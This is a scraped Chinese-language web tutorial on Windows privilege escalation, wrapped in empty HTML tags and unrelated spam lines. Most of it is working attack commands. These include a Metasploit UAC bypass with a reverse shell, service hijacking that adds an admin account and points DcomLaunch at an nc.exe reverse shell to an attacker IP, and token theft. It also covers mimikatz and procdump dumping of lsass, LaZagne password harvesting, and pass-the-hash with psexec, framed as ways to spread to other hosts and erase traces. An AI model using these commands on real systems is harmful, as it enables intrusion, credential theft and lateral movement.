<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                合規國際互聯網加速 OSASE為企業客戶提供高速穩定SD-WAN國際加速解決方案。 廣告
                # Windows系統提權 ## 提權知識儲備 ### 1??常見提權方法 >1、 溢出漏洞提權? 2、 數據庫提權? 3、 第三方軟件提權 ### 2??Cmd命令無法執行原因分析 有時通過webshell連接上操作系統后,cmd命令可能無法執行,原因一般都是被管理員降權或刪除、組件被刪除。 解決方法是通過腳本木馬查找可讀可寫目錄,上傳cmd.exe,調用設定cmd路徑(找可讀可寫目錄不要選帶空格目錄)。 ```cmd #設置cmd執行路徑 setp c:\xxx\vvv\cmd.exe ``` ### 3??提權常用命令講解 ``` whoami ——查看用戶權限 systeminfo ——查看操作系統,補丁情況 ipconfig——查看當前服務器IP ipconfig /all net user——查看當前用戶情況 netstat ——查看當前網絡連接情況? netstat –ano? /netstat –an | find “ESTABLISHED” tasklist ——查看當前進程情況 tasklist /svc taskkill ——結束進程 taskkill -PID xx net start? ——啟動服務 net stop ——停止服務 hostname ——獲取主機名稱 quser or query user ——獲取在線用戶 netstat -ano | findstr 3389 ——獲取rdp連接來源IP dir c:\programdata\ ——分析安裝殺軟 wmic qfe get Caption,Description,HotFixID,InstalledOn ——列出已安裝的補丁 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber ——獲取遠程端口 tasklist /svc | find "TermService" + netstat -ano ——獲取遠程端口 ``` ## 系統溢出漏洞提權實戰 ### **零、系統溢出漏洞提權分類:** 1. 遠程溢出 攻擊者只需要與服務器建立連接,然后根據系統的漏洞,使用相應的溢出程序,即可獲取到遠程服務器的root權限。 2. 本地溢出 首先要有服務器的一個用戶,且需要有執行的權限的用戶才能發起提權, 攻擊者通常會向服務器上傳本地溢出程序,在服務器端執行,如果系統存在漏洞,那么將溢出root權限 ### 一、UAC繞過提權 UAC(User Account Control)是微軟在 Windows Vista 以后版本引入的一種安全機制,通過 UAC,應用程序和任務可始終在非管理員帳戶的安全上下文中運行,除非管理員特別授予管理員級別的系統訪問權限。 當獲得的權限是屬于管理員組的時候但是并不是administrator這個用戶,此時就可能需要我們進行繞過UAC的操作,否則雖然是管理員組但是實際上并沒有管理員所對應的高權限操作,這個時候就需要bypass uac。 **uac 繞過exp** ```sh #用kali use exploit/windows/local/ask meterpreter > background [*] Backgrounding session 1... msf5 exploit(multi/handler) > use exploit/windows/local/ask msf5 exploit(windows/local/ask) > set session 1 msf5 exploit(windows/local/ask) > set lhost 192.168.60.79 msf5 exploit(windows/local/ask) > set lport 4444 msf5 exploit(windows/local/ask) > set payload windows/meterpreter/reverse_tcp msf5 exploit(windows/local/ask) > set technique exe msf5 exploit(windows/local/ask) > exploit 其他exp: use exploit/windows/local/bypassuacuse exploit/windows/local/bypassuac ``` ### 二、利用系統內核溢出漏洞提權 此提權方法即是通過系統本身存在的一些漏洞,未曾打相應的補丁而暴露出來的提權方法,依托可以提升權限的EXP和它們的補丁編號,進行提升權限。 **微軟官方時刻關注漏洞補丁列表網址:** https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/securitybulletins2017 >比如常用的幾個已公布的 exp:KB2592799、KB3000061、KB2592799 **github中整理好的溢出提權exp:** https://github.com/SecWiki/windows-kernel-exploits https://github.com/WindowsExploits/Exploits https://github.com/AusJock/Privilege-Escalation #### 如何判斷可用的漏洞 1. **快速查找操作系統未打補丁腳本** 可以最安全的減少目標機的未知錯誤,以免影響業務。 命令行下執行檢測未打補丁的命令如下: ```cmd systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt ``` 2. **MSF后滲透掃描:** ``` post/windows/gather/enum_patches ``` 3. **Powershell掃描:** ``` Import-Module C:\Sherlock.ps1 Find-AllVulns ``` ### 三、利用SC將administrator提權至system **試用版本:**windows 7、8、03、08、12、16 關于sc命令:SC 是用于與服務控制管理器和服務進行通信的命令行程序。提供的功能類似于“控制面板”中“管理工具”項中的“服務”。 ```cmd sc Create syscmd binPath= “cmd /K start” type= own type= interact sc start systcmd ``` >命令含義: >創建一個名叫syscmd的新的交互式的cmd服務 >然后執行`sc start systcmd`,就得到了一個system權限的cmd環境 ### 四、利用不帶引號的服務路徑 **Windows命令解釋程序可能會遇到名稱中的空格,并且沒有包裝在引號中的時候。就有可能出現解析漏洞。** 如開機自啟動中有程序路徑`C:\Program Files\Vulnerable.exe`,其中存在空格,此時在C盤根目錄上傳Program.exe文件時,可能會被目標開機自啟動。如果無效,還可以嘗試在C:\Program Files路徑下上傳Vulnerable.exe文件。 ``` C:\Program.exe C:\Program Files\Vulnerable.exe C:\Program Files\Vulnerable Service\Sub.exe C:\Program Files\Vulnerable Service\Sub Directory\service.exe ``` **可以使用以下命令查看錯誤配置的路徑** ```cmd wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ ``` ### 五、利用不安全的服務權限 **?即使正確引用了服務路徑,也可能存在其他漏洞。由于管理配置錯誤,用戶可能對服務擁有過多的權限,例如,可以直接修改它。** **AccessChk工具可以用來查找用戶可以修改的服務:** ```cmd accesschk.exe -uwcqv “Authenticated Users” * /accepteula accesschk.exe -uwcqv “user” * ``` **sc命令也可以用來查找用戶可以修改的服務:** ```cmd #查找可以修改的服務 sc qc “Service” sc config xxx binpath= “net user rottenadmin P@ssword123! /add” sc stop xxx sc start xxx ``` 每當我們開啟服務時sc命令都返回了一個錯誤。這是因為net user命令沒有指向二進制服務,因此SCM無法 與服務進行通信,通過使用執行自動遷移到新進程的payload,手動遷移進程,或者在執行后將服務的bin路徑設置回原始服務二進制文件,可以解決這個問題。或者我們在權限允許的情況下,將我們的木馬放到服務目錄下,并重命名為服務啟動的應用名稱。電腦重啟時即可獲得一個system的shell ##### 完整案例: **①、利用系統自帶的 DcomLaunch服務測試(此服務Power User組低權可操作)** ```cmd #查詢DcomLaunch的詳細信息 sc qc DcomLaunch #查看服務是否啟動 net start | find "DCOM Server Process Launcher" #運行 tasklist /svc 找到對應服務 tasklist /svc ``` **②、修改服務并獲取系統權限** 這里要配置使用nc反彈shell到我的攻擊機上,把nc放到c:\windows\temp目錄下,使用sc對服務進行修改 ``` sc config DcomLaunch binpath= "C:\wmpub\nc.exe -nv 192.168.32.194 4433 -e C:\WINDOWS\system32\cmd.exe" ``` ?注意`binpath=`后面一定要有個空格,IP為攻擊者IP **③、查看是否第二步成功** ``` sc qc DcomLaunch ``` **④、配置賬號密碼** ``` sc config DcomLaunch obj= ".\LocalSystem" password= "" ``` **obj:**指定運行服務將使用的帳戶名,或指定運行驅動程序將使用的 Windows 驅動程序對象名。默認設置為 LocalSystem。 **password:**指定一個密碼。如果使用了非 LocalSystem 的帳戶,則此項是必需的。 **⑤、重啟服務** ``` net start DcomLaunch ``` **⑥、攻擊機上用nc進行監聽4433即可得到反彈的shell** ``` nc.exe -vv -l -p 4433 ``` ### 六、計劃任務 **如果攻擊者對以高權限運行的任務所在的目錄具有寫權限,就可以使用惡意程序覆蓋原來的程序,這樣在下次計劃執行時,就會以高權限來運行惡意程序。** ```CMD #查看計算機的計劃任務 schtasks /query /fo LIST /v #查看指定目錄的權限配置情況 accesschk.exe -dqv "D:\test" -accepteula ``` ### 七、Meterpreter基礎提權 **首先在Meterpreter會話執行ps命令查看目標機當前進程:** 假設此處看到了一個進程,運行賬戶是域管理員,我們可以再第一欄找到對應的進程PID,假設PID為2584: 然后我們可以執行以下語句竊取該用戶進程的令牌: ``` steal_token??2584 ``` ## 溢出漏洞安全防范 **及時通過Windows Update或第三方工具360更新補丁** ## 提權后獲取管理員密碼 雖然我們已經有了管理員權限,但是我們最好是再獲取管理員密碼,原因如下 1. 很多管理員賬號密碼都設置成一樣的,攻下一臺就可以拿下所有 2. 遠程連接時,比如使用木馬,很容易被發現或者清理 3. 如果用管理員賬號,可以清除滲透痕跡 4. 正規滲透測試過程中,都是取得管理員賬號密碼,登錄3389端口或反端口連接者證明為成功 > 簡單地說就是從獲取管理員權限——>獲取管理員賬號 ### 1、本地管理員密碼如何直接提取 #### ①、直接通過mimikatz讀取管理員密碼 > mimikatz,很多人稱之為密碼抓取神器,它的功能很多,最重要的是能從 lsass.exe進程中獲取windows的賬號及明文密碼——這是以前的事了,微軟知道后已經準備了補丁,lsass進程不再保存明文口令。Mimikatz 現在只能讀到加密后的密碼。 > **win10無效** ```cmd # 提升權限 privilege::debug # 抓取密碼 sekurlsa::logonpassWords ``` 當無法上傳mimikatz工具到目標服務器時,可以利用procdump把lsass進程的內存文件導出本地,再在本地利用mimikatz讀取密碼,具體步驟如下 ```cmd # 導出lsass.exe進程為lsass.dump文件 procdump64.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full ``` #### ②、Lazagne 需要本地支持python? > LaZagne項目是用于開源應用程序獲取大量的密碼存儲在本地計算機上。每個軟件都使用不同的技術(純文本,API,自定義算法,數據庫等)存儲其密碼。 > LaZagne 幾乎支持市面上大部分常用工具。包括瀏覽器、Git、SVN、Wifi、Databases 等。 > 但是對聊天軟件的支持不夠本土化,主要支持一些國外的聊天軟件。 ```cmd laZagne.exe all? #獲取所有密碼 laZagne.exe browsers? #只獲取瀏覽器記住的密碼 laZagne.exe all -oN? #將輸出保存到文件???? ``` -oN表示是純文本格式(正常的)的輸出,和屏幕打印內容相同;還可以寫成-oJ,JSON格式的輸出,更便于程序解析;或者寫成-oA,同時輸出兩種格式。 ### 2、本地Hash遠程直接登錄 * * * 高版本的系統,密碼不是明文的情況下,直接通過哈希值來取得管理員賬號。主要通過MSF提供的exploit/windows/smb/psexec模塊來完成 ```sh msf>use exploit/windows/smb/psexec msf>set rhost #目標IP? msf>set SMBUser administrator? #目標賬號 msf>set SMBPass aaaaaa:bbbbbb #目標哈希值 msf>exploit? msf>shell ``` ### 3、Hash密鑰暴力破解 * * * 1. 通過LC5暴力hash密碼 使用gmer直接提權SAM和system文件或用Pwdump7提取hash后,最后使用LC5破解 2. 使用ophcrack破解系統hash密碼 http://simeon.blog.51cto.com/18680/122160
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看